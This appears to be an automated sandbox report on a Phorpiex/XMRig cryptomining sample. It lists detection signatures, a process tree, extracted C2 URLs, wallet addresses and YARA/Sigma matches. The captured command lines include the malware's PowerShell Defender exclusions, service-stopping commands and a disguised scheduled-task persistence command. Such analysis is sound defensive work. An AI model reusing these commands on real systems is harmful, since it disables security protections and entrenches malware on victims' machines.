Edit tour
Windows
Analysis Report
Us051y7j25.exe
Overview
General Information
| Sample name: | Us051y7j25.exerenamed because original name is a hash value |
| Original sample name: | fdbf0c19ebcafcf5e4295edc9e4a37836ba580b9a4d63b2a9ccdf8418ed5fe84.exe |
| Analysis ID: | 1542687 |
| MD5: | 82894caeb7e149bb38d344fbc2a821d9 |
| SHA1: | bf86bd33666e58f291bc9135a95f67a7483cde52 |
| SHA256: | fdbf0c19ebcafcf5e4295edc9e4a37836ba580b9a4d63b2a9ccdf8418ed5fe84 |
| Tags: | CoinMinerexeuser-JAMESWT_MHT |
| Infos: |   |
 | |
Detection
Phorpiex, Xmrig
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Stop multiple services
Suricata IDS alerts for network traffic
Yara detected Phorpiex
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Changes security center settings (notifications, updates, antivirus, firewall)
Contains functionality to check if Internet connection is working
Contains functionality to detect sleep reduction / modifications
Detected Stratum mining protocol
Drops PE files with a suspicious file extension
Drops executables to the windows directory (C:\Windows) and starts them
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after checking mutex)
Found hidden mapped module (file has been removed from disk)
Found strings related to Crypto-Mining
Hides that the sample has been downloaded from the Internet (zone.identifier)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Stops critical windows services
Suspicious powershell command line found
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (may stop execution after accessing registry keys)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
Us051y7j25.exe (PID: 5348 cmdline: "C:\Users\ user\Deskt op\Us051y7 j25.exe" MD5: 82894CAEB7E149BB38D344FBC2A821D9) - 21324.scr (PID: 4416 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\21324. scr" /S MD5: 06560B5E92D704395BC6DAE58BC7E794) - sysppvrdnvs.exe (PID: 1588 cmdline:
C:\Windows \sysppvrdn vs.exe MD5: 06560B5E92D704395BC6DAE58BC7E794) 
cmd.exe (PID: 3552 cmdline: "C:\Window s\System32 \cmd.exe" /c powersh ell -Comma nd "Add-Mp Preference -Exclusio nPath $env :windir; A dd-MpPrefe rence -Exc lusionPath $env:TEMP ; Add-MpPr eference - ExclusionP ath $env:U SERPROFILE " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 6688 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
powershell.exe (PID: 2052 cmdline: powershell -Command "Add-MpPre ference -E xclusionPa th $env:wi ndir; Add- MpPreferen ce -Exclus ionPath $e nv:TEMP; A dd-MpPrefe rence -Exc lusionPath $env:USER PROFILE" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - cmd.exe (PID: 6212 cmdline:
"C:\Window s\System32 \cmd.exe" /c sc stop UsoSvc & sc stop Wa aSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 5804 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - sc.exe (PID: 6488 cmdline:
sc stop Us oSvc MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8) - sc.exe (PID: 1220 cmdline:
sc stop Wa aSMedicSvc MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8) - sc.exe (PID: 6364 cmdline:
sc stop wu auserv MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8) - sc.exe (PID: 6484 cmdline:
sc stop Do Svc MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8) - sc.exe (PID: 3360 cmdline:
sc stop BI TS /wait MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8) - 1881231804.exe (PID: 3180 cmdline:
C:\Users\u ser\AppDat a\Local\Te mp\1881231 804.exe MD5: CB8420E681F68DB1BAD5ED24E7B22114) - cmd.exe (PID: 6672 cmdline:
"C:\Window s\System32 \cmd.exe" /c reg del ete "HKCU\ SOFTWARE\M icrosoft\W indows\Cur rentVersio n\Run" /v "Windows U pgrade Man ager" /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 5724 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - reg.exe (PID: 2812 cmdline:
reg delete "HKCU\SOF TWARE\Micr osoft\Wind ows\Curren tVersion\R un" /v "Wi ndows Upgr ade Manage r" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4) - cmd.exe (PID: 5696 cmdline:
"C:\Window s\System32 \cmd.exe" /c schtask s /delete /f /tn "Wi ndows Upgr ade Manage r" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 5612 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - schtasks.exe (PID: 5224 cmdline:
schtasks / delete /f /tn "Windo ws Upgrade Manager" MD5: 76CD6626DD8834BD4A42E6A565104DC2) - 2314627202.exe (PID: 5792 cmdline:
C:\Users\u ser\AppDat a\Local\Te mp\2314627 202.exe MD5: 0C37EE292FEC32DBA0420E6C94224E28) - 1091722296.exe (PID: 5112 cmdline:
C:\Users\u ser\AppDat a\Local\Te mp\1091722 296.exe MD5: 96509AB828867D81C1693B614B22F41D) - 1239611256.exe (PID: 2052 cmdline:
C:\Users\u ser\AppDat a\Local\Te mp\1239611 256.exe MD5: 13B26B2C7048A92D6A843C1302618FAD) - 146916724.exe (PID: 6992 cmdline:
C:\Users\u ser\AppDat a\Local\Te mp\1469167 24.exe MD5: 5A0D146F7A911E98DA8CC3C6DE8ACABF)
- sysppvrdnvs.exe (PID: 4492 cmdline:
"C:\Window s\sysppvrd nvs.exe" MD5: 06560B5E92D704395BC6DAE58BC7E794)
- powershell.exe (PID: 3184 cmdline:
C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.exe <# evrkcgqew# > IF([Syst em.Environ ment]::OSV ersion.Ver sion -lt [ System.Ver sion]"6.2" ) { schtas ks /create /f /sc on logon /rl highest /t n 'Microso ft Windows Security' /tr '''C: \Users\use r\Microsof t Windows Security\w inupsecvmg r.exe''' } Else { Re gister-Sch eduledTask -Action ( New-Schedu ledTaskAct ion -Execu te 'C:\Use rs\user\Mi crosoft Wi ndows Secu rity\winup secvmgr.ex e') -Trigg er (New-Sc heduledTas kTrigger - AtLogOn) - Settings ( New-Schedu ledTaskSet tingsSet - AllowStart IfOnBatter ies -Disal lowHardTer minate -Do ntStopIfGo ingOnBatte ries -Dont StopOnIdle End -Execu tionTimeLi mit (New-T imeSpan -D ays 1000)) -TaskName 'Microsof t Windows Security' -RunLevel 'Highest' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 6704 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- winupsecvmgr.exe (PID: 4044 cmdline:
"C:\Users\ user\Micro soft Windo ws Securit y\winupsec vmgr.exe" MD5: 13B26B2C7048A92D6A843C1302618FAD) - conhost.exe (PID: 7112 cmdline:
C:\Windows \System32\ conhost.ex e MD5: 0D698AF330FD17BEE3BF90011D49251D) - dwm.exe (PID: 6072 cmdline:
C:\Windows \System32\ dwm.exe MD5: 5C27608411832C5B39BA04E33D53536C)
- powershell.exe (PID: 6952 cmdline:
C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.exe <# evrkcgqew# > IF([Syst em.Environ ment]::OSV ersion.Ver sion -lt [ System.Ver sion]"6.2" ) { schtas ks /create /f /sc on logon /rl highest /t n 'Microso ft Windows Security' /tr '''C: \Users\use r\Microsof t Windows Security\w inupsecvmg r.exe''' } Else { Re gister-Sch eduledTask -Action ( New-Schedu ledTaskAct ion -Execu te 'C:\Use rs\user\Mi crosoft Wi ndows Secu rity\winup secvmgr.ex e') -Trigg er (New-Sc heduledTas kTrigger - AtLogOn) - Settings ( New-Schedu ledTaskSet tingsSet - AllowStart IfOnBatter ies -Disal lowHardTer minate -Do ntStopIfGo ingOnBatte ries -Dont StopOnIdle End -Execu tionTimeLi mit (New-T imeSpan -D ays 1000)) -TaskName 'Microsof t Windows Security' -RunLevel 'Highest' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 6788 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 6432 cmdline:
C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.exe <# ydcfdz#> I F([System. Environmen t]::OSVers ion.Versio n -lt [Sys tem.Versio n]"6.2") { schtasks /create /f /sc onlog on /rl hig hest /tn ' Microsoft Windows Se curity' /t r '''C:\Us ers\user\M icrosoft W indows Sec urity\winu psecvmgr.e xe''' } El se { Regis ter-Schedu ledTask -A ction (New -Scheduled TaskAction -Execute 'C:\Users\ user\Micro soft Windo ws Securit y\winupsec vmgr.exe') -Trigger (New-Sched uledTaskTr igger -AtL ogOn) -Set tings (New -Scheduled TaskSettin gsSet -All owStartIfO nBatteries -Disallow HardTermin ate -DontS topIfGoing OnBatterie s -DontSto pOnIdleEnd -Executio nTimeLimit (New-Time Span -Days 1000)) -T askName 'M icrosoft W indows Sec urity' -Ru nLevel 'Hi ghest' -Fo rce; } MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 2188 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- winupsecvmgr.exe (PID: 5352 cmdline:
"C:\Users\ user\Micro soft Windo ws Securit y\winupsec vmgr.exe" MD5: 13B26B2C7048A92D6A843C1302618FAD)
- powershell.exe (PID: 5424 cmdline:
C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.exe <# evrkcgqew# > IF([Syst em.Environ ment]::OSV ersion.Ver sion -lt [ System.Ver sion]"6.2" ) { schtas ks /create /f /sc on logon /rl highest /t n 'Microso ft Windows Security' /tr '''C: \Users\use r\Microsof t Windows Security\w inupsecvmg r.exe''' } Else { Re gister-Sch eduledTask -Action ( New-Schedu ledTaskAct ion -Execu te 'C:\Use rs\user\Mi crosoft Wi ndows Secu rity\winup secvmgr.ex e') -Trigg er (New-Sc heduledTas kTrigger - AtLogOn) - Settings ( New-Schedu ledTaskSet tingsSet - AllowStart IfOnBatter ies -Disal lowHardTer minate -Do ntStopIfGo ingOnBatte ries -Dont StopOnIdle End -Execu tionTimeLi mit (New-T imeSpan -D ays 1000)) -TaskName 'Microsof t Windows Security' -RunLevel 'Highest' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 2716 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cleanup
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| Phorpiex | Proofpoint describes Phorpiex/Trik as a SDBot fork (thus IRC-based) that has been used to distribute GandCrab, Pushdo, Pony, and coinminers. The name Trik is derived from PDB strings. | No Attribution |
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| xmrig | According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information. | No Attribution |
{"C2 url": ["http://185.215.113.66/", "http://91.202.233.141/"], "Wallet": ["15TssKwtjMtwy4vDLcLsQUZUD2B9f7eDjw85sBNVC5LRPPnC", "1BzmrjmKPKSR2hH5BeJySfiVA676E8DYaK", "lskaj7asu8rwp4p9kpdqebnqh6kzyuefzqjszyd5w", "ltc1qt0n3f0t7vz9k0mvcswk477shrxwjhf9sj5ykrp", "zil19delrukejtr306u0s7ludxrwk434jcl6ghpng3", "zncBgwqwqquPLHrM4ozrtr3LPyFuNVemy4v", "cro1xq0gkfldclds7y7fa2x6x25zu7ttnxxkjs66gf", "erd1hwcnscv0tldljl68upajgfqrcrmtznth4n6ee46le43cqpe5tatqw96dnx", "kava1r9xek0h0vkfra44lg3rp07teh9elxg2n6vsdzn", "inj1e2g9nyfjcnvgjpaa3czx2spgf2jx3gp4gk0nl9", "osmo125f3mw4xd9htpsq4zj5w5ezm5gags37y6pnhx3", "one1mnk7lk2506r0ewvr7zgwfuyt7ahvngwqedka3x", "3PMiLynrGVZ8oEqvoqC4hXD67B1WoALR4pc", "3ESHude8zUHksQg1h6hHmzY79BS36L91Yn", "DLUzwvyxN1RrwjByUPPzVMdfxNRPGVRMMA", "DsWwjQcpgo8AoFYvFnLrwFpcx8wgjSYLexe", "t1J6GCPCiHW1eRdjJgDDu6b1vSVmL5U7Twh", "terra1mw3dhwak2qe46drv4g7lvgwn79fzm8nr0htdq5", "thor1tdexg3v738xg9n289d6586frflkkcxxdgtauur", "tz1ZUNuZkWjdTt597axUcyZ5kFRtUZmUKuG2", "stars125f3mw4xd9htpsq4zj5w5ezm5gags37yxxh6mj", "stride125f3mw4xd9htpsq4zj5w5ezm5gags37y33qmy0", "sei125f3mw4xd9htpsq4zj5w5ezm5gags37ylk33kz", "sys1q0zg3clqajs04p2yhkgf96nf4hmup9mdr8l38u6", "bnb1msyt0djx4ecspfxg5en0ye465kg3kmv9utzml2", "bc1ppypcmu3684n648gyj62gjp2rw0xy7w3vwfamatlg29ajp4z52desafa0sr", "bc1qc9edl4hzl9jyt8twdad3zjeh2df2znq96tdezd", "btg1qwg85kf0r3885a82wtld053fy490lm2q2gemgpy", "ronin:a77fa3ea6e09a5f3fbfcb2a42fe21b5cf0ecdd17", "bitcoincash:qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r", "cosmos125f3mw4xd9htpsq4zj5w5ezm5gags37yj6q8sr", "addr1qxlwyj95fk9exqf55tdknx49e5443nr925tajatrdqpp8djla7u9jhswc3dk39se79f9zhwwq2ca95er3mylm48wyalqr62dmg", "nano_3p8stz4wqicgda1g3ifd48girzd5u74is8sdqq99tkuuz1b96wjwbc7yrmnb", "GBQJMXYXPRIWFMXIFJR35ZB7LRKMB4PHCIUAUFR3TKUL6RDBZVLZEUJ3", "Gcrx8cK7ffKLaPJwiYHQrgi6pFTLbJsBPV", "EQxXrZv7VQpoAA15kJ1XJyXVxT3yQSoNyM", "B62qpDfv86fUZc4ntrYJL6eFJZajjNKRcBuW5iPbcLNkiPekLkV8NdA", "BKyTYg4eZC9NCzcL8M3hcUmDhCnBJrSScH", "UQAbBKbfkiK3Gjo86zgD3yYO5Njf7zxPTEO4JLqN13ruoGDb"]}| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_Phorpiex_4 | Yara detected Phorpiex | Joe Security | ||
| JoeSecurity_Phorpiex_4 | Yara detected Phorpiex | Joe Security | ||
| JoeSecurity_Phorpiex_4 | Yara detected Phorpiex | Joe Security | ||
| JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | ||
| MacOS_Cryptominer_Xmrig_241780a1 | unknown | unknown |
| |
| Click to see the 2 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_Phorpiex_4 | Yara detected Phorpiex | Joe Security | ||
| JoeSecurity_Phorpiex_4 | Yara detected Phorpiex | Joe Security | ||
| JoeSecurity_Phorpiex_4 | Yara detected Phorpiex | Joe Security | ||
| JoeSecurity_Phorpiex_4 | Yara detected Phorpiex | Joe Security | ||
| JoeSecurity_Phorpiex_4 | Yara detected Phorpiex | Joe Security | ||
| Click to see the 10 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_Phorpiex_4 | Yara detected Phorpiex | Joe Security | ||
| JoeSecurity_Phorpiex_4 | Yara detected Phorpiex | Joe Security | ||
| JoeSecurity_Phorpiex_4 | Yara detected Phorpiex | Joe Security | ||
| JoeSecurity_Phorpiex_4 | Yara detected Phorpiex | Joe Security | ||
| JoeSecurity_Phorpiex_4 | Yara detected Phorpiex | Joe Security | ||
| Click to see the 17 entries | ||||
Operating System Destruction |   |
|---|
| Source: | Author: Joe Security: | ||
System Summary | |
|---|
| Source: | Author: Jonathan Cheong, oscd.community: | ||